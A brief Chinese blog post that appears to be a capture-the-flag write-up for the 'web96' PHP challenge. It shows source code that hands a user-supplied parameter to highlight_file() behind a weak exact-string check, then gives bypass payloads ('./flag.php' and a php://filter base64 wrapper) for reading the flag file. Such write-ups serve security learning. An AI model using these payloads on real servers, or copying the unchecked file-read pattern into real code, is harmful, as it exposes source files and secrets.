web96笔记(读取文件,参数不等于flag.php) 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 19:21:24
# @link: https://ctfer.com

*/


highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }


}

读取文件,参数不等于flag.php,那直接加个./即可,有多种办法,php伪协议也可

?u=./flag.php

只要u != flag.php即可
当然也可以⽤php伪协议
?u=php://filter/read=convert.base64-encode/resource=flag.php
 
 
posted @ 2025-03-18 11:14  justdoIT*  阅读(4)  评论(0)    收藏  举报